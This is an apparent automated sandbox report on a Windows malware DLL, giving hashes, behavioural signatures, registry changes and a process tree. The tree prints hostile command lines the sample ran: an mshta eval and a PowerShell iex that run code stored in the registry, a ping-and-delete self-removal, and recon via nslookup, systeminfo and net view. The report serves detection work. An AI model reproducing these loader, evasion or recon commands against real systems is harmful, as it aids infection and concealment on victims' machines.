Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
09-12-2020 18:28
Static task
static1
Behavioral task
behavioral1
Sample
YyIUwQv.dll
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
General
-
Target
YyIUwQv.dll
-
Size
565KB
-
MD5
7099df90d162654fa9e3effa97279f51
-
SHA1
605233409966904822a2e356d662ef837f778396
-
SHA256
c513c300dd29b821c87623a3718a5d29186fb9bdabb61e42abe5c42cb944bb5f
-
SHA512
0623038f073dcb8930228f6866a073e9b6bbfaa79fc0f4ee652cb2b2fc2cb65f91028c33d38597504ad62adca00d477804a908034e82796fdf8e32cb378b8b53
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 612 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1496 set thread context of 1236 1496 powershell.exe 14 PID 1236 set thread context of 612 1236 Explorer.EXE 49 PID 612 set thread context of 1596 612 cmd.exe 51 PID 1236 set thread context of 1052 1236 Explorer.EXE 61 -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 1644 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1844 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 592 systeminfo.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6910C731-3A55-11EB-A476-76BCB60B883E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b08d0a1862ced601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000289122f063f2c60051adf5b1a9aec858c30bb37af0c83f4b07786cec3113119b000000000e80000000020000200000001af957b67e6c926a80a7304d09493b688d103d068e53176c0f05de29fd99df94900000002bf6b167bdd148eef14f23ed4d6de5e95d356f639a456a17b046844d9c5696d658aa14c4fae81d58216f7d12a49a93ba8e2ffb464408774e8c8571315cfee27b2d039489f6983cd9189068d14754c84b9f90952afd3980a783e924ee2862c7cf362515d355eb50364b6221f40550ce99114204bff4d237da9ff576a7aaff03f7be59a32d5b264ed6a3c32596f0c928e940000000d92a75917de03ba1a69abb088c17a0584e73d705c6bd24738fbfefd10c388255a982db420947611c2f3cc5974c532b9575f3d8eaf0cb5c7e2fc06dc6a7a670d6 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3F4763F1-3A55-11EB-A476-76BCB60B883E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b660000000002000000000010660000000100002000000003c8a73e107286b8c847230c9835ad55408f50e8daaf7f146223f86608bbdced000000000e80000000020000200000000bbb3120b5dbcc1034fbbea5c9654b7a87ee64bd601a47258fabbff02b5f7b88200000005185102831a6f2634c79a63e4a745829dca1a9a7ed25c85324e14409cb8197a440000000bc015c5b2566588df6230d47aa214268c0cc94d2539475842d4b9c69e7c377b9974846e843577d00f6aa1813ce3a103dafa1366578a9d7b454cff2a9b449aee1 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5C1A8A71-3A55-11EB-A476-76BCB60B883E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1596 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1596 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1784 rundll32.exe 1496 powershell.exe 1496 powershell.exe 1236 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1496 powershell.exe 1236 Explorer.EXE 612 cmd.exe 1236 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 1844 tasklist.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1304 iexplore.exe 1016 iexplore.exe 1312 iexplore.exe 1312 iexplore.exe 1312 iexplore.exe -
Suspicious use of SetWindowsHookEx 21 IoCs
pid Process 1304 iexplore.exe 1304 iexplore.exe 1800 IEXPLORE.EXE 1800 IEXPLORE.EXE 1016 iexplore.exe 1016 iexplore.exe 1504 IEXPLORE.EXE 1504 IEXPLORE.EXE 1312 iexplore.exe 1312 iexplore.exe 1012 IEXPLORE.EXE 1012 IEXPLORE.EXE 1312 iexplore.exe 1312 iexplore.exe 1720 IEXPLORE.EXE 1720 IEXPLORE.EXE 1312 iexplore.exe 1312 iexplore.exe 1012 IEXPLORE.EXE 1012 IEXPLORE.EXE 1236 Explorer.EXE -
Suspicious use of WriteProcessMemory 129 IoCs
description pid Process procid_target PID 1208 wrote to memory of 1784 1208 rundll32.exe 25 PID 1208 wrote to memory of 1784 1208 rundll32.exe 25 PID 1208 wrote to memory of 1784 1208 rundll32.exe 25 PID 1208 wrote to memory of 1784 1208 rundll32.exe 25 PID 1208 wrote to memory of 1784 1208 rundll32.exe 25 PID 1208 wrote to memory of 1784 1208 rundll32.exe 25 PID 1208 wrote to memory of 1784 1208 rundll32.exe 25 PID 1304 wrote to memory of 1800 1304 iexplore.exe 33 PID 1304 wrote to memory of 1800 1304 iexplore.exe 33 PID 1304 wrote to memory of 1800 1304 iexplore.exe 33 PID 1304 wrote to memory of 1800 1304 iexplore.exe 33 PID 1016 wrote to memory of 1504 1016 iexplore.exe 36 PID 1016 wrote to memory of 1504 1016 iexplore.exe 36 PID 1016 wrote to memory of 1504 1016 iexplore.exe 36 PID 1016 wrote to memory of 1504 1016 iexplore.exe 36 PID 1312 wrote to memory of 1012 1312 iexplore.exe 38 PID 1312 wrote to memory of 1012 1312 iexplore.exe 38 PID 1312 wrote to memory of 1012 1312 iexplore.exe 38 PID 1312 wrote to memory of 1012 1312 iexplore.exe 38 PID 1312 wrote to memory of 1720 1312 iexplore.exe 39 PID 1312 wrote to memory of 1720 1312 iexplore.exe 39 PID 1312 wrote to memory of 1720 1312 iexplore.exe 39 PID 1312 wrote to memory of 1720 1312 iexplore.exe 39 PID 1340 wrote to memory of 1496 1340 mshta.exe 43 PID 1340 wrote to memory of 1496 1340 mshta.exe 43 PID 1340 wrote to memory of 1496 1340 mshta.exe 43 PID 1496 wrote to memory of 1652 1496 powershell.exe 45 PID 1496 wrote to memory of 1652 1496 powershell.exe 45 PID 1496 wrote to memory of 1652 1496 powershell.exe 45 PID 1652 wrote to memory of 776 1652 csc.exe 46 PID 1652 wrote to memory of 776 1652 csc.exe 46 PID 1652 wrote to memory of 776 1652 csc.exe 46 PID 1496 wrote to memory of 1604 1496 powershell.exe 47 PID 1496 wrote to memory of 1604 1496 powershell.exe 47 PID 1496 wrote to memory of 1604 1496 powershell.exe 47 PID 1604 wrote to memory of 1648 1604 csc.exe 48 PID 1604 wrote to memory of 1648 1604 csc.exe 48 PID 1604 wrote to memory of 1648 1604 csc.exe 48 PID 1496 wrote to memory of 1236 1496 powershell.exe 14 PID 1496 wrote to memory of 1236 1496 powershell.exe 14 PID 1496 wrote to memory of 1236 1496 powershell.exe 14 PID 1236 wrote to memory of 612 1236 Explorer.EXE 49 PID 1236 wrote to memory of 612 1236 Explorer.EXE 49 PID 1236 wrote to memory of 612 1236 Explorer.EXE 49 PID 1236 wrote to memory of 612 1236 Explorer.EXE 49 PID 1236 wrote to memory of 612 1236 Explorer.EXE 49 PID 1236 wrote to memory of 612 1236 Explorer.EXE 49 PID 612 wrote to memory of 1596 612 cmd.exe 51 PID 612 wrote to memory of 1596 612 cmd.exe 51 PID 612 wrote to memory of 1596 612 cmd.exe 51 PID 612 wrote to memory of 1596 612 cmd.exe 51 PID 612 wrote to memory of 1596 612 cmd.exe 51 PID 612 wrote to memory of 1596 612 cmd.exe 51 PID 1236 wrote to memory of 520 1236 Explorer.EXE 52 PID 1236 wrote to memory of 520 1236 Explorer.EXE 52 PID 1236 wrote to memory of 520 1236 Explorer.EXE 52 PID 520 wrote to memory of 1516 520 cmd.exe 54 PID 520 wrote to memory of 1516 520 cmd.exe 54 PID 520 wrote to memory of 1516 520 cmd.exe 54 PID 1236 wrote to memory of 852 1236 Explorer.EXE 55 PID 1236 wrote to memory of 852 1236 Explorer.EXE 55 PID 1236 wrote to memory of 852 1236 Explorer.EXE 55 PID 1236 wrote to memory of 1796 1236 Explorer.EXE 57 PID 1236 wrote to memory of 1796 1236 Explorer.EXE 57 PID 1236 wrote to memory of 1796 1236 Explorer.EXE 57 PID 1796 wrote to memory of 592 1796 cmd.exe 59 PID 1796 wrote to memory of 592 1796 cmd.exe 59 PID 1796 wrote to memory of 592 1796 cmd.exe 59 PID 1236 wrote to memory of 1052 1236 Explorer.EXE 61 PID 1236 wrote to memory of 1052 1236 Explorer.EXE 61 PID 1236 wrote to memory of 1052 1236 Explorer.EXE 61 PID 1236 wrote to memory of 1052 1236 Explorer.EXE 61 PID 1236 wrote to memory of 1052 1236 Explorer.EXE 61 PID 1236 wrote to memory of 1052 1236 Explorer.EXE 61 PID 1236 wrote to memory of 1052 1236 Explorer.EXE 61 PID 1236 wrote to memory of 1660 1236 Explorer.EXE 64 PID 1236 wrote to memory of 1660 1236 Explorer.EXE 64 PID 1236 wrote to memory of 1660 1236 Explorer.EXE 64 PID 1236 wrote to memory of 1208 1236 Explorer.EXE 66 PID 1236 wrote to memory of 1208 1236 Explorer.EXE 66 PID 1236 wrote to memory of 1208 1236 Explorer.EXE 66 PID 1208 wrote to memory of 1644 1208 cmd.exe 68 PID 1208 wrote to memory of 1644 1208 cmd.exe 68 PID 1208 wrote to memory of 1644 1208 cmd.exe 68 PID 1236 wrote to memory of 1564 1236 Explorer.EXE 69 PID 1236 wrote to memory of 1564 1236 Explorer.EXE 69 PID 1236 wrote to memory of 1564 1236 Explorer.EXE 69 PID 1236 wrote to memory of 980 1236 Explorer.EXE 71 PID 1236 wrote to memory of 980 1236 Explorer.EXE 71 PID 1236 wrote to memory of 980 1236 Explorer.EXE 71 PID 980 wrote to memory of 1640 980 cmd.exe 73 PID 980 wrote to memory of 1640 980 cmd.exe 73 PID 980 wrote to memory of 1640 980 cmd.exe 73 PID 1236 wrote to memory of 1820 1236 Explorer.EXE 74 PID 1236 wrote to memory of 1820 1236 Explorer.EXE 74 PID 1236 wrote to memory of 1820 1236 Explorer.EXE 74 PID 1236 wrote to memory of 2016 1236 Explorer.EXE 76 PID 1236 wrote to memory of 2016 1236 Explorer.EXE 76 PID 1236 wrote to memory of 2016 1236 Explorer.EXE 76 PID 2016 wrote to memory of 1844 2016 cmd.exe 78 PID 2016 wrote to memory of 1844 2016 cmd.exe 78 PID 2016 wrote to memory of 1844 2016 cmd.exe 78 PID 1236 wrote to memory of 1408 1236 Explorer.EXE 79 PID 1236 wrote to memory of 1408 1236 Explorer.EXE 79 PID 1236 wrote to memory of 1408 1236 Explorer.EXE 79 PID 1236 wrote to memory of 592 1236 Explorer.EXE 81 PID 1236 wrote to memory of 592 1236 Explorer.EXE 81 PID 1236 wrote to memory of 592 1236 Explorer.EXE 81 PID 592 wrote to memory of 1784 592 cmd.exe 83 PID 592 wrote to memory of 1784 592 cmd.exe 83 PID 592 wrote to memory of 1784 592 cmd.exe 83 PID 1236 wrote to memory of 848 1236 Explorer.EXE 84 PID 1236 wrote to memory of 848 1236 Explorer.EXE 84 PID 1236 wrote to memory of 848 1236 Explorer.EXE 84 PID 1236 wrote to memory of 1048 1236 Explorer.EXE 86 PID 1236 wrote to memory of 1048 1236 Explorer.EXE 86 PID 1236 wrote to memory of 1048 1236 Explorer.EXE 86 PID 1048 wrote to memory of 1508 1048 cmd.exe 88 PID 1048 wrote to memory of 1508 1048 cmd.exe 88 PID 1048 wrote to memory of 1508 1048 cmd.exe 88 PID 1236 wrote to memory of 1780 1236 Explorer.EXE 89 PID 1236 wrote to memory of 1780 1236 Explorer.EXE 89 PID 1236 wrote to memory of 1780 1236 Explorer.EXE 89 PID 1236 wrote to memory of 736 1236 Explorer.EXE 91 PID 1236 wrote to memory of 736 1236 Explorer.EXE 91 PID 1236 wrote to memory of 736 1236 Explorer.EXE 91 PID 1236 wrote to memory of 1248 1236 Explorer.EXE 93 PID 1236 wrote to memory of 1248 1236 Explorer.EXE 93 PID 1236 wrote to memory of 1248 1236 Explorer.EXE 93
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\YyIUwQv.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\YyIUwQv.dll,#13⤵
- Suspicious behavior: EnumeratesProcesses
PID:1784
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\B3914E35-76AB-5DAC-1897-0AE1CCBBDEA5\\\Adtsgsvc'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\B3914E35-76AB-5DAC-1897-0AE1CCBBDEA5").apiMbrkr))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\12vyij4i\12vyij4i.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES47AA.tmp" "c:\Users\Admin\AppData\Local\Temp\12vyij4i\CSCEB4DC31767FC40DCA1846C41F5D0416A.TMP"5⤵PID:776
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o3acrfsr\o3acrfsr.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4827.tmp" "c:\Users\Admin\AppData\Local\Temp\o3acrfsr\CSC39D9C03A419A4E939725E888D79E4017.TMP"5⤵PID:1648
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\YyIUwQv.dll"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1596
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\67B4.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1516
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\67B4.bi1"2⤵PID:852
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:1796
-
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:592
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1052
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:1660
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:1208
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:1644
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5708.bin1"2⤵PID:1564
-
-
